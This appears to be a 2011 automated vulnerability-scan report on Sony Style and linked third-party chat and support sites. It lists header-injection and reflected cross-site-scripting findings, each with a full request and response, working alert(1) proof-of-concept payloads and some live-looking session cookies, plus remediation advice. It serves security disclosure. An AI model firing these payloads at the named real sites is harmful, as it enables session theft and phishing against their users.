XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06232011

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b9c9%0d%0ad30a80f6707 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b9c9%0d%0ad30a80f6707/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644643900&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/8b9c9
d30a80f6707/wcs/stores/servlet/CategoryDisplay&catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644643900&XID=M: esupport
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28059%0d%0a55571c41948 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28059%0d%0a55571c41948/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/28059
55571c41948/wcs/stores/servlet/SYNewsletterOptInView&storeId=10151&catalogId=10551&langId=-1&XID=M: esupport
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a76d%0d%0aacf572565ef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a76d%0d%0aacf572565ef/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; s_cc=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=85ddbc91e1d02d84452784d87f823ca75e46b2c7608495f34e035480db2332020de46713222f7b4ed69e61a0; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":1,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; mbox=check#true#1308841151|session#1308841090453-474854#1308842951|PC#1308841090453-474854.17#1310050710; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/4a76d
acf572565ef/wcs/stores/servlet/StoreCatalogDisplay&langId=-1&storeId=10151&catalogId=10551&XID=M: sidenav:esupport
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:18:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.4. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b1f95%0d%0a9bd0f0f51d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b1f95%0d%0a9bd0f0f51d9/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/b1f95
9bd0f0f51d9/wcs/stores/servlet/CRMPortalHome&langId=-1&storeId=10151&catalogId=10551&XID=M: sidenav:esupport
Content-Length: 510
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.sonystyle.com/webapp/wcs/stores/ser
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 7 instances of this issue:

http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]
http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php [source parameter]
http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView [cmsId parameter]
https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [action parameter]
https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]
https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]
http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71737897/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 8c50e<img%20src%3da%20onerror%3dalert(1)>3de729ec697 was submitted in the msessionkey parameter. This input was echoed as 8c50e<img src=a onerror=alert(1)>3de729ec697 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/71737897/?&visitor=16101514677756&msessionkey=49162650217946299498c50e<img%20src%3da%20onerror%3dalert(1)>3de729ec697&siteContainer=STANDALONE&site=71737897&cmd=mTagKnockPage&lpCallId=986859841504-958643907680&protV=20&lpjson=1&id=8121771027&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sonystyle-sales-general-english%7ClpMTagConfig.db1%7ClpButton-DIV%7C%23chat-sonystyle-service-english%7ClpMTagConfig.db1%7ClpButton-DIV-service%7C%23chat-sonystyle-sales-cart-english%7ClpMTagConfig.db1%7ClpButton-DIV-checkout%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697; path=/hc/71737897
Set-Cookie: HumanClickKEY=49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 15:17:23 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31206

lpConnLib.Process({"ResultSet": {"lpCallId":"986859841504-958643907680","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='71737897-VID'; lpMTagConfig.FPC_VID='16101514677756'; lpMTagConfig.FPC_SKEY_NAME='71737897-SKEY'; lpMTagConfig.FPC_SKEY='49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_71737897'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

2.2. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sonystyle.custhelp.com
Path:	/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73185"><script>alert(1)</script>86f752791d1 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source=73185"><script>alert(1)</script>86f752791d1 HTTP/1.1
Host: sonystyle.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:36 GMT
Server: Apache
RNT-Time: D=134191 t=1308842376214677
RNT-Machine: 09
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15137

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightnow.com/crm/document">
<head>
<script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></scr
...[SNIP]...
<input type="hidden" id="q_28_28" rows="3" cols="40" "text" name="q_28" value="73185"><script>alert(1)</script>86f752791d1" />
...[SNIP]...

2.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView [cmsId parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The value of the cmsId request parameter is copied into a JavaScript rest-of-line comment. The payload 63c67%0ac304ff0fa44 was submitted in the cmsId parameter. This input was echoed as 63c67
c304ff0fa44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page63c67%0ac304ff0fa44&catalogId=10551&storeId=10151&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 72493
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 72493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -
...[SNIP]...
king
s.eVar8=''
// SQS tracking
var SQS = getURLParameter("SQS");
if (SQS == '') SQS = getURLParameter("sqs");
if (SQS != '') {
s.eVar9 = SQS;
}
// CMS Spot Tracking
s.eVar10=_cmsId;//'smb_landing_page63c67
c304ff0fa44';
// Geo Segmentation City
s.eVar11=''
// Geo Segmentation State
s.eVar12=''
// Geo Segmentation Country
s.eVar13=''
// Coupon Tracking
s.eVar14=''
// Campaign Tracking
var campaign = getURLParameter(
...[SNIP]...

2.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 65bd4<script>alert(1)</script>d76e4a52225 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture65bd4<script>alert(1)</script>d76e4a52225&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

2.5. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the vbrowser request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 723f4'%3balert(1)//3785ea87a8a was submitted in the vbrowser parameter. This input was echoed as 723f4';alert(1)//3785ea87a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other723f4'%3balert(1)//3785ea87a8a&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:10 GMT
Content-Length: 1044

//alert('writeinfocapture');
document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...
<input type="text" class="general_textbox plus_text_other723f4';alert(1)//3785ea87a8a" id="i_text1" name="i_text1" onfocus="style.borderColor=\'#FF9900\'" onblur="style.borderColor=\'#cccccc\'" style="width:75%;" value = "" onKeyPress="return checkEnter(event)">
...[SNIP]...

2.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the vbrowser request parameter is copied into a JavaScript rest-of-line comment. The payload 8354b%0aalert(1)//0ce0b71cff9 was submitted in the vbrowser parameter. This input was echoed as 8354b
alert(1)//0ce0b71cff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other8354b%0aalert(1)//0ce0b71cff9&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:12 GMT
Content-Length: 1042

//alert('writeinfocapture');
document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...
<input type="text" class="general_textbox plus_text_other8354b
alert(1)//0ce0b71cff9" id="i_text1" name="i_text1" onfocus="style.borderColor=\'#FF9900\'" onblur="style.borderColor=\'#cccccc\'" style="width:75%;" value = "" onKeyPress="return checkEnter(event)">
...[SNIP]...

2.7. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b41e5'-alert(1)-'1d0f52fc05b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b41e5'-alert(1)-'1d0f52fc05b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Db41e5%27%2Dalert%281%29%2D%271d0f52fc05b; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=IPDHGDPDGMCLEBHCBIOHDNJH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=b41e5'-alert(1)-'1d0f52fc05b');
lpAddVars('page','pageName','');
</script>
...[SNIP]...

3. SSL cookie without secure flag set previous next
There are 3 instances of this issue:

https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

3.1. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://servicesales.sel.sony.com
Path:	/ecom/accessories/web/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
